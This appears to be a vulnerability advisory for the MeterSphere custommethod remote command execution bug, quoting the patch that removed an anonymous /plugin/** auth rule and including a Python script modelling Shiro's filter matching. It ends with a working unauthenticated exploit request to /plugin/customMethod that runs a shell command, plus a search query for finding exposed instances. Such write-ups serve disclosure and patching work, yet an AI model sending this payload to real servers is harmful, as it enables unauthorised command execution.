Metersphere Custommethod Remote Command Execution Vulnerability
Vulnerability Description
On January 5, 2022, the Chuangyu 404 Active Defense Experimental Team discovered a vulnerability in the MeterSphere open source continuous testing platform and reported it to the MeterSphere R&D team.
Vulnerability Impact
MeterSphere v1.13.0 - v1.16.3
Network asset search
app="MeterSphere"
Vulnerability Reproduction
Login page
Looking at the official fix, the patch consists of removing the following line, which exempted every path under /plugin/ from authentication:
filterChainDefinitionMap.put("/plugin/**", "anon");
https://github.com/metersphere/metersphere/pull/9140/files
View file /backend/src/main/java/io/metersphere/controller/PluginController.java
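To see why deleting that single put() line closes the hole, here is an added audit script (not MeterSphere's code) that mimics Shiro's first-match filter chain resolution over the put() declarations; only the /plugin/** line is quoted from the patch, the /signin and /** entries and the "authc" filter name are assumed for illustration.

```python
import re
from collections import OrderedDict

# Constructed excerpts in the style of the ShiroConfig source. Only the /plugin/**
# line is taken from the patch; the other entries are assumed for illustration.
VULNERABLE_SOURCE = '''
filterChainDefinitionMap.put("/signin", "anon");
filterChainDefinitionMap.put("/plugin/**", "anon");
filterChainDefinitionMap.put("/**", "authc");
'''
FIXED_SOURCE = '''
filterChainDefinitionMap.put("/signin", "anon");
filterChainDefinitionMap.put("/**", "authc");
'''

PUT_RE = re.compile(r'filterChainDefinitionMap\.put\("([^"]+)",\s*"([^"]+)"\);')

def parse_chain(source):
    """Pattern -> filter string, in declaration order. Order matters: Shiro's
    PathMatchingFilterChainResolver applies the first pattern that matches."""
    return OrderedDict((p, f.strip()) for p, f in PUT_RE.findall(source))

def ant_to_regex(pattern):
    """Translate an Ant-style path pattern (Shiro's default matcher) into a regex."""
    out, i = [], 0
    while i < len(pattern):
        if pattern.startswith('/**', i) and i + 3 == len(pattern):
            out.append('(/.*)?'); i += 3      # trailing /** : the path or any descendant
        elif pattern.startswith('**/', i):
            out.append('(.*/)?'); i += 3      # **/ : zero or more leading segments
        elif pattern.startswith('**', i):
            out.append('.*'); i += 2
        elif pattern[i] == '*':
            out.append('[^/]*'); i += 1       # * : any chars within one segment
        elif pattern[i] == '?':
            out.append('[^/]'); i += 1        # ? : exactly one char within a segment
        else:
            out.append(re.escape(pattern[i])); i += 1
    return re.compile('^' + ''.join(out) + '$')

def resolve_filters(chain, path):
    """Return the filter string the request path would be routed through."""
    for pattern, filters in chain.items():
        if ant_to_regex(pattern).match(path):
            return filters
    return None

def anonymous_paths(chain, endpoints):
    """Audit helper: which of the given endpoints resolve to the 'anon' chain?"""
    return [p for p in endpoints if resolve_filters(chain, p) == 'anon']
```

Run against the two sources, the vulnerable chain routes /plugin/customMethod through "anon" while the fixed chain falls through to the authenticated catch-all.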
Send the following request:
POST /plugin/customMethod
{"entry":"Evil","request":"id"}
This post is licensed under CC BY 4.0 by the author.